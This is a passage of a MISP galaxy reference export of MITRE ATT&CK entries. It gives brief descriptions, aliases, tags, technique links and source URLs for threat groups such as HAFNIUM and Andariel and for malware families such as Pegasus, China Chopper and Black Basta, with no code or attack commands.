Gelsemium - G0141

[Gelsemium](https://attack.mitre.org/groups/G0141) is a cyberespionage group that has been active since at least 2014, targeting governmental institutions, electronics manufacturers, universities, and religious organizations in East Asia and the Middle East.(Citation: ESET Gelsemium June 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Gelsemium - G0141"

Gelsemium - G0141 is also known as:

  • Gelsemium

Table 7144. Table References

Links

https://attack.mitre.org/groups/G0141

https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf

LuminousMoth - G1014

[LuminousMoth](https://attack.mitre.org/groups/G1014) is a Chinese-speaking cyber espionage group that has been active since at least October 2020. [LuminousMoth](https://attack.mitre.org/groups/G1014) has targeted high-profile organizations, including government entities, in Myanmar, the Philippines, Thailand, and other parts of Southeast Asia. Some security researchers have concluded there is a connection between [LuminousMoth](https://attack.mitre.org/groups/G1014) and [Mustang Panda](https://attack.mitre.org/groups/G0129) based on similar targeting and TTPs, as well as network infrastructure overlaps.(Citation: Kaspersky LuminousMoth July 2021)(Citation: Bitdefender LuminousMoth July 2021)

The tag is: misp-galaxy:mitre-intrusion-set="LuminousMoth - G1014"

LuminousMoth - G1014 is also known as:

  • LuminousMoth

Table 7145. Table References

Links

https://attack.mitre.org/groups/G1014

https://securelist.com/apt-luminousmoth/103332/

https://www.bitdefender.com/blog/labs/luminousmoth-plugx-file-exfiltration-and-persistence-revisited

MoustachedBouncer - G1019

[MoustachedBouncer](https://attack.mitre.org/groups/G1019) is a cyberespionage group that has been active since at least 2014 targeting foreign embassies in Belarus.(Citation: MoustachedBouncer ESET August 2023)

The tag is: misp-galaxy:mitre-intrusion-set="MoustachedBouncer - G1019"

MoustachedBouncer - G1019 is also known as:

  • MoustachedBouncer

Table 7146. Table References

Links

https://attack.mitre.org/groups/G1019

https://www.welivesecurity.com/en/eset-research/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus/

CostaRicto - G0132

[CostaRicto](https://attack.mitre.org/groups/G0132) is a suspected hacker-for-hire cyber espionage campaign that has targeted multiple industries worldwide since at least 2019. [CostaRicto](https://attack.mitre.org/groups/G0132)'s targets, a large portion of which are financial institutions, are scattered across Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-intrusion-set="CostaRicto - G0132"

CostaRicto - G0132 is also known as:

  • CostaRicto

Table 7147. Table References

Links

https://attack.mitre.org/groups/G0132

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

Confucius - G0142

[Confucius](https://attack.mitre.org/groups/G0142) is a cyber espionage group that has primarily targeted military personnel, high-profile personalities, business persons, and government organizations in South Asia since at least 2013. Security researchers have noted similarities between [Confucius](https://attack.mitre.org/groups/G0142) and [Patchwork](https://attack.mitre.org/groups/G0040), particularly in their respective custom malware code and targets.(Citation: TrendMicro Confucius APT Feb 2018)(Citation: TrendMicro Confucius APT Aug 2021)(Citation: Uptycs Confucius APT Jan 2021)

The tag is: misp-galaxy:mitre-intrusion-set="Confucius - G0142"

Confucius - G0142 is also known as:

  • Confucius

  • Confucius APT

Table 7148. Table References

Links

https://attack.mitre.org/groups/G0142

https://www.trendmicro.com/en_us/research/18/b/deciphering-confucius-cyberespionage-operations.html

https://www.trendmicro.com/en_us/research/21/h/confucius-uses-pegasus-spyware-related-lures-to-target-pakistani.html

https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

Windigo - G0124

The [Windigo](https://attack.mitre.org/groups/G0124) group has been operating since at least 2011, compromising thousands of Linux and Unix servers using the [Ebury](https://attack.mitre.org/software/S0377) SSH backdoor to create a spam botnet. Despite law enforcement intervention against the creators, [Windigo](https://attack.mitre.org/groups/G0124) operators continued updating [Ebury](https://attack.mitre.org/software/S0377) through 2019.(Citation: ESET Windigo Mar 2014)(Citation: CERN Windigo June 2019)

The tag is: misp-galaxy:mitre-intrusion-set="Windigo - G0124"

Windigo - G0124 is also known as:

  • Windigo

Table 7149. Table References

Links

https://attack.mitre.org/groups/G0124

https://security.web.cern.ch/advisories/windigo/windigo.shtml

https://www.welivesecurity.com/2014/03/18/operation-windigo-the-vivisection-of-a-large-linux-server-side-credential-stealing-malware-campaign/

HAFNIUM - G0125

[HAFNIUM](https://attack.mitre.org/groups/G0125) is a likely state-sponsored cyber espionage group operating out of China that has been active since at least January 2021. [HAFNIUM](https://attack.mitre.org/groups/G0125) primarily targets entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)

The tag is: misp-galaxy:mitre-intrusion-set="HAFNIUM - G0125"

HAFNIUM - G0125 is also known as:

  • HAFNIUM

  • Operation Exchange Marauder

Table 7150. Table References

Links

https://attack.mitre.org/groups/G0125

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

Higaisa - G0126

[Higaisa](https://attack.mitre.org/groups/G0126) is a threat group suspected to have South Korean origins. [Higaisa](https://attack.mitre.org/groups/G0126) has targeted government, public, and trade organizations in North Korea; however, they have also carried out attacks in China, Japan, Russia, Poland, and other nations. [Higaisa](https://attack.mitre.org/groups/G0126) was first disclosed in early 2019 but is assessed to have operated as early as 2009.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)

The tag is: misp-galaxy:mitre-intrusion-set="Higaisa - G0126"

Higaisa - G0126 is also known as:

  • Higaisa

Table 7151. Table References

Links

https://attack.mitre.org/groups/G0126

https://blog.malwarebytes.com/threat-analysis/2020/06/higaisa/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/covid-19-and-new-year-greetings-the-higaisa-group/

https://www.zscaler.com/blogs/security-research/return-higaisa-apt

ZIRCONIUM - G0128

[ZIRCONIUM](https://attack.mitre.org/groups/G0128) is a threat group operating out of China, active since at least 2017, that has targeted individuals associated with the 2020 US presidential election and prominent leaders in the international affairs community.(Citation: Microsoft Targeting Elections September 2020)(Citation: Check Point APT31 February 2021)

The tag is: misp-galaxy:mitre-intrusion-set="ZIRCONIUM - G0128"

ZIRCONIUM - G0128 is also known as:

  • ZIRCONIUM

  • APT31

Table 7152. Table References

Links

https://attack.mitre.org/groups/G0128

https://blogs.microsoft.com/on-the-issues/2020/09/10/cyberattacks-us-elections-trump-biden/

https://research.checkpoint.com/2021/the-story-of-jian/

BackdoorDiplomacy - G0135

[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) is a cyber espionage threat group that has been active since at least 2017. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has targeted Ministries of Foreign Affairs and telecommunication companies in Africa, Europe, the Middle East, and Asia.(Citation: ESET BackdoorDiplomacy Jun 2021)

The tag is: misp-galaxy:mitre-intrusion-set="BackdoorDiplomacy - G0135"

BackdoorDiplomacy - G0135 is also known as:

  • BackdoorDiplomacy

Table 7153. Table References

Links

https://attack.mitre.org/groups/G0135

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

IndigoZebra - G0136

[IndigoZebra](https://attack.mitre.org/groups/G0136) is a suspected Chinese cyber espionage group that has been targeting Central Asian governments since at least 2014.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017)

The tag is: misp-galaxy:mitre-intrusion-set="IndigoZebra - G0136"

IndigoZebra - G0136 is also known as:

  • IndigoZebra

Table 7154. Table References

Links

https://attack.mitre.org/groups/G0136

https://research.checkpoint.com/2021/indigozebra-apt-continues-to-attack-central-asia-with-evolving-tools/

https://securelist.com/apt-trends-report-q2-2017/79332/

https://thehackernews.com/2021/07/indigozebra-apt-hacking-campaign.html

Andariel - G0138

[Andariel](https://attack.mitre.org/groups/G0138) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://attack.mitre.org/groups/G0138) has primarily focused its operations—which have included destructive attacks—against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://attack.mitre.org/groups/G0138)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: AhnLab Andariel Subgroup of Lazarus June 2018)(Citation: TrendMicro New Andariel Tactics July 2018)(Citation: CrowdStrike Silent Chollima Adversary September 2021)

[Andariel](https://attack.mitre.org/groups/G0138) is considered a sub-set of [Lazarus Group](https://attack.mitre.org/groups/G0032), and has been attributed to North Korea’s Reconnaissance General Bureau.(Citation: Treasury North Korean Cyber Groups September 2019)

North Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://attack.mitre.org/groups/G0032) instead of tracking clusters or subgroups.

The tag is: misp-galaxy:mitre-intrusion-set="Andariel - G0138"

Andariel - G0138 is also known as:

  • Andariel

  • Silent Chollima

Table 7155. Table References

Links

http://download.ahnlab.com/global/brochure/%5BAnalysis%5DAndariel_Group.pdf

http://www.issuemakerslab.com/research3/

https://adversary.crowdstrike.com/en-US/adversary/silent-chollima/

https://attack.mitre.org/groups/G0138

https://home.treasury.gov/news/press-releases/sm774

https://www.fsec.or.kr/user/bbs/fsec/163/344/bbsDataView/1680.do

https://www.trendmicro.com/en_us/research/18/g/new-andariel-reconnaissance-tactics-hint-at-next-targets.html

TeamTNT - G0139

[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group has been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September 2020)(Citation: Aqua TeamTNT August 2020)(Citation: Intezer TeamTNT Explosion September 2021)

The tag is: misp-galaxy:mitre-intrusion-set="TeamTNT - G0139"

TeamTNT - G0139 is also known as:

  • TeamTNT

Table 7156. Table References

Links

https://attack.mitre.org/groups/G0139

https://blog.aquasec.com/container-security-tnt-container-attack

https://cybersecurity.att.com/blogs/labs-research/teamtnt-with-new-campaign-aka-chimaera

https://documents.trendmicro.com/assets/white_papers/wp-tracking-the-activities-of-teamTNT.pdf

https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/

https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/

https://www.cadosecurity.com/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials/

https://www.intezer.com/blog/cloud-security/attackers-abusing-legitimate-cloud-monitoring-tools-to-conduct-cyber-attacks/

https://www.intezer.com/wp-content/uploads/2021/09/TeamTNT-Cryptomining-Explosion.pdf

https://www.lacework.com/blog/taking-teamtnt-docker-images-offline/

Malware

Name of ATT&CK software.

Malware is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.
authors

MITRE

Hacking Team UEFI Rootkit - S0047

[Hacking Team UEFI Rootkit](https://attack.mitre.org/software/S0047) is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)

The tag is: misp-galaxy:mitre-malware="Hacking Team UEFI Rootkit - S0047"

Hacking Team UEFI Rootkit - S0047 is also known as:

  • Hacking Team UEFI Rootkit

Hacking Team UEFI Rootkit - S0047 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7157. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-uses-uefi-bios-rootkit-to-keep-rcs-9-agent-in-target-systems/

https://attack.mitre.org/software/S0047

X-Agent for Android - S0314

[X-Agent for Android](https://attack.mitre.org/software/S0314) is Android malware that was placed in a repackaged version of a Ukrainian artillery targeting application. The malware reportedly retrieved general location data on where the victim device was used, and therefore could likely indicate the potential location of Ukrainian artillery. (Citation: CrowdStrike-Android) It is tracked separately from [CHOPSTICK](https://attack.mitre.org/software/S0023).

The tag is: misp-galaxy:mitre-malware="X-Agent for Android - S0314"

X-Agent for Android - S0314 has relationships with:

  • similar: misp-galaxy:tool="CHOPSTICK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="X-Agent (Android)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="X-Agent" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="CHOPSTICK - S0023" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerade as Legitimate Application - T1444" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7158. Table References

Links

https://attack.mitre.org/software/S0314

https://www.crowdstrike.com/wp-content/brochures/FancyBearTracksUkrainianArtillery.pdf

Red Alert 2.0 - S0539

[Red Alert 2.0](https://attack.mitre.org/software/S0539) is a banking trojan that masquerades as a VPN client.(Citation: Sophos Red Alert 2.0)

The tag is: misp-galaxy:mitre-malware="Red Alert 2.0 - S0539"

Red Alert 2.0 - S0539 is also known as:

  • Red Alert 2.0

Table 7159. Table References

Links

https://attack.mitre.org/software/S0539

https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/

Exaramel for Linux - S0401

[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Linux - S0401"

Exaramel for Linux - S0401 is also known as:

  • Exaramel for Linux

Table 7160. Table References

Links

https://attack.mitre.org/software/S0401

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

Winnti for Linux - S0430

[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the Winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Linux - S0430"

Winnti for Linux - S0430 is also known as:

  • Winnti for Linux

Table 7161. Table References

Links

https://attack.mitre.org/software/S0430

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

XLoader for iOS - S0490

[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).

The tag is: misp-galaxy:mitre-malware="XLoader for iOS - S0490"

XLoader for iOS - S0490 is also known as:

  • XLoader for iOS

Table 7162. Table References

Links

https://attack.mitre.org/software/S0490

https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/

Winnti for Windows - S0141

[Winnti for Windows](https://attack.mitre.org/software/S0141) is a modular remote access Trojan (RAT) that has likely been used by multiple groups to carry out intrusions in various regions since at least 2010, including by one group referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: Kaspersky Winnti April 2013)(Citation: Microsoft Winnti Jan 2017)(Citation: Novetta Winnti April 2015)(Citation: 401 TRG Winnti Umbrella May 2018) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)

The tag is: misp-galaxy:mitre-malware="Winnti for Windows - S0141"

Winnti for Windows - S0141 is also known as:

  • Winnti for Windows

Winnti for Windows - S0141 has relationships with:

  • similar: misp-galaxy:malpedia="Winnti (Windows)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Winnti" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

Table 7163. Table References

Links

https://401trg.github.io/pages/burning-umbrella.html

https://attack.mitre.org/software/S0141

https://blogs.technet.microsoft.com/mmpc/2017/01/25/detecting-threat-actors-in-recent-german-industrial-attacks-with-windows-defender-atp/

https://medium.com/chronicle-blog/winnti-more-than-just-windows-and-gates-e4f03436031a

https://securelist.com/winnti-more-than-just-a-game/37029/

https://web.archive.org/web/20150412223949/http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf

Pegasus for Android - S0316

[Pegasus for Android](https://attack.mitre.org/software/S0316) is the Android version of malware that has reportedly been linked to the NSO Group. (Citation: Lookout-PegasusAndroid) (Citation: Google-Chrysaor) The iOS version is tracked separately under [Pegasus for iOS](https://attack.mitre.org/software/S0289).

The tag is: misp-galaxy:mitre-malware="Pegasus for Android - S0316"

Pegasus for Android - S0316 is also known as:

  • Pegasus for Android

  • Chrysaor

Pegasus for Android - S0316 has relationships with:

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 7164. Table References

Links

https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html

https://attack.mitre.org/software/S0316

https://blog.lookout.com/blog/2017/04/03/pegasus-android/

XLoader for Android - S0318

[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).

The tag is: misp-galaxy:mitre-malware="XLoader for Android - S0318"

XLoader for Android - S0318 is also known as:

  • XLoader for Android

Table 7165. Table References

Links

https://attack.mitre.org/software/S0318

https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/

https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/

Pegasus for iOS - S0289

[Pegasus for iOS](https://attack.mitre.org/software/S0289) is the iOS version of malware that has reportedly been linked to the NSO Group. It has been advertised and sold to target high-value victims. (Citation: Lookout-Pegasus) (Citation: PegasusCitizenLab) The Android version is tracked separately under [Pegasus for Android](https://attack.mitre.org/software/S0316).

The tag is: misp-galaxy:mitre-malware="Pegasus for iOS - S0289"

Pegasus for iOS - S0289 is also known as:

  • Pegasus for iOS

Pegasus for iOS - S0289 has relationships with:

  • similar: misp-galaxy:malpedia="Chrysaor" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Chrysaor" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1404" with estimative-language:likelihood-probability="almost-certain"

Table 7166. Table References

Links

https://attack.mitre.org/software/S0289

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-technical-analysis.pdf

Exaramel for Windows - S0343

[Exaramel for Windows](https://attack.mitre.org/software/S0343) is a backdoor used for targeting Windows systems. The Linux version is tracked separately under [Exaramel for Linux](https://attack.mitre.org/software/S0401).(Citation: ESET TeleBots Oct 2018)

The tag is: misp-galaxy:mitre-malware="Exaramel for Windows - S0343"

Exaramel for Windows - S0343 is also known as:

  • Exaramel for Windows

Table 7167. Table References

Links

https://attack.mitre.org/software/S0343

https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/

P.A.S. Webshell - S0598

[P.A.S. Webshell](https://attack.mitre.org/software/S0598) is a publicly available multifunctional PHP webshell in use since at least 2016 that provides remote access and execution on target web servers.(Citation: ANSSI Sandworm January 2021)

The tag is: misp-galaxy:mitre-malware="P.A.S. Webshell - S0598"

P.A.S. Webshell - S0598 is also known as:

  • P.A.S. Webshell

  • Fobushell

Table 7168. Table References

Links

https://attack.mitre.org/software/S0598

https://us-cert.cisa.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf

gh0st RAT - S0032

[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups.(Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)

The tag is: misp-galaxy:mitre-malware="gh0st RAT - S0032"

gh0st RAT - S0032 is also known as:

  • gh0st RAT

  • Mydoor

  • Moudoor

gh0st RAT - S0032 has relationships with:

  • similar: misp-galaxy:tool="gh0st" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Input Capture - T1056" with estimative-language:likelihood-probability="almost-certain"

Table 7169. Table References

Links

https://attack.mitre.org/software/S0032

https://research.nccgroup.com/2018/04/17/decoding-network-data-from-a-gh0st-rat-variant/

https://web.archive.org/web/20230115144216/http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf

https://www.arbornetworks.com/blog/asert/musical-chairs-playing-tetris/

https://www.fireeye.com/blog/threat-research/2015/07/demonstrating_hustle.html

China Chopper - S0020

[China Chopper](https://attack.mitre.org/software/S0020) is a [Web Shell](https://attack.mitre.org/techniques/T1505/003) hosted on Web servers to provide access back into an enterprise network that does not rely on an infected system calling back to a remote command and control server.(Citation: Lee 2013) It has been used by several threat groups.(Citation: Dell TG-3390)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Rapid7 HAFNIUM Mar 2021)

The tag is: misp-galaxy:mitre-malware="China Chopper - S0020"

China Chopper - S0020 is also known as:

  • China Chopper

China Chopper - S0020 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 7170. Table References

Links

https://attack.mitre.org/software/S0020

https://us-cert.cisa.gov/ncas/alerts/aa21-200a

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://www.rapid7.com/blog/post/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Skeleton Key - S0007

[Skeleton Key](https://attack.mitre.org/software/S0007) is malware used to inject false credentials into domain controllers with the intent of creating a backdoor password. (Citation: Dell Skeleton) Functionality similar to [Skeleton Key](https://attack.mitre.org/software/S0007) is included as a module in [Mimikatz](https://attack.mitre.org/software/S0002).

The tag is: misp-galaxy:mitre-malware="Skeleton Key - S0007"

Skeleton Key - S0007 is also known as:

  • Skeleton Key

Skeleton Key - S0007 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 7171. Table References

Links

https://attack.mitre.org/software/S0007

https://www.secureworks.com/research/skeleton-key-malware-analysis

P2P ZeuS - S0016

[P2P ZeuS](https://attack.mitre.org/software/S0016) is a closed-source fork of the leaked version of the ZeuS botnet. It presents improvements over the leaked version, including a peer-to-peer architecture. (Citation: Dell P2P ZeuS)

The tag is: misp-galaxy:mitre-malware="P2P ZeuS - S0016"

P2P ZeuS - S0016 is also known as:

  • P2P ZeuS

  • Peer-to-Peer ZeuS

  • Gameover ZeuS

P2P ZeuS - S0016 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 7172. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

https://attack.mitre.org/software/S0016

Unknown Logger - S0130

[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)

The tag is: misp-galaxy:mitre-malware="Unknown Logger - S0130"

Unknown Logger - S0130 is also known as:

  • Unknown Logger

Unknown Logger - S0130 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"

Table 7173. Table References

Links

https://attack.mitre.org/software/S0130

https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf

Black Basta - S1070

[Black Basta](https://attack.mitre.org/software/S1070) is ransomware written in C++ that has been offered within the ransomware-as-a-service (RaaS) model since at least April 2022; there are variants that target Windows and VMware ESXi servers. [Black Basta](https://attack.mitre.org/software/S1070) operations have included the double extortion technique, where, in addition to demanding ransom for decrypting the files of targeted organizations, the cyber actors also threaten to post sensitive information to a leak site if the ransom is not paid. [Black Basta](https://attack.mitre.org/software/S1070) affiliates have targeted multiple high-value organizations, with the largest number of victims based in the U.S. Based on similarities in TTPs, leak sites, payment sites, and negotiation tactics, security researchers assess the [Black Basta](https://attack.mitre.org/software/S1070) RaaS operators could include current or former members of the [Conti](https://attack.mitre.org/software/S0575) group.(Citation: Palo Alto Networks Black Basta August 2022)(Citation: Deep Instinct Black Basta August 2022)(Citation: Minerva Labs Black Basta May 2022)(Citation: Avertium Black Basta June 2022)(Citation: NCC Group Black Basta June 2022)(Citation: Cyble Black Basta May 2022)

The tag is: misp-galaxy:mitre-malware="Black Basta - S1070"

Black Basta - S1070 is also known as:

  • Black Basta

Table 7174. Table References

Links

https://attack.mitre.org/software/S1070

https://blog.cyble.com/2022/05/06/black-basta-ransomware/

https://minerva-labs.com/blog/new-black-basta-ransomware-hijacks-windows-fax-service/

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware

https://www.avertium.com/resources/threat-reports/in-depth-look-at-black-basta-ransomware

https://www.deepinstinct.com/blog/black-basta-ransomware-threat-emergence

Cherry Picker - S0107

[Cherry Picker](https://attack.mitre.org/software/S0107) is a point of sale (PoS) memory scraper. (Citation: Trustwave Cherry Picker)

The tag is: misp-galaxy:mitre-malware="Cherry Picker - S0107"

Cherry Picker - S0107 is also known as:

  • Cherry Picker

Cherry Picker - S0107 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 7175. Table References

Links

https://attack.mitre.org/software/S0107

https://www.trustwave.com/Resources/SpiderLabs-Blog/Shining-the-Spotlight-on-Cherry-Picker-PoS-Malware/

Zeus Panda - S0330

[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)

The tag is: misp-galaxy:mitre-malware="Zeus Panda - S0330"

Zeus Panda - S0330 is also known as:

  • Zeus Panda

Table 7176. Table References

Links

https://attack.mitre.org/software/S0330

https://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html#More

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

SpyNote RAT - S0305

[SpyNote RAT](https://attack.mitre.org/software/S0305) (Remote Access Trojan) is a family of malicious Android apps. The [SpyNote RAT](https://attack.mitre.org/software/S0305) builder tool can be used to develop malicious apps with the malware’s functionality. (Citation: Zscaler-SpyNote)

The tag is: misp-galaxy:mitre-malware="SpyNote RAT - S0305"

SpyNote RAT - S0305 is also known as:

  • SpyNote RAT

SpyNote RAT - S0305 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"

  • uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"

Table 7177. Table References

Links

https://attack.mitre.org/software/S0305

https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app

3PARA RAT - S0066

[3PARA RAT](https://attack.mitre.org/software/S0066) is a remote access tool (RAT) programmed in C++ that has been used by [Putter Panda](https://attack.mitre.org/groups/G0024). (Citation: CrowdStrike Putter Panda)

The tag is: misp-galaxy:mitre-malware="3PARA RAT - S0066"

3PARA RAT - S0066 is also known as:

  • 3PARA RAT

3PARA RAT - S0066 has relationships with:

  • similar: misp-galaxy:rat="3PARA RAT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7178. Table References

Links

http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf

https://attack.mitre.org/software/S0066

Agent Smith - S0440

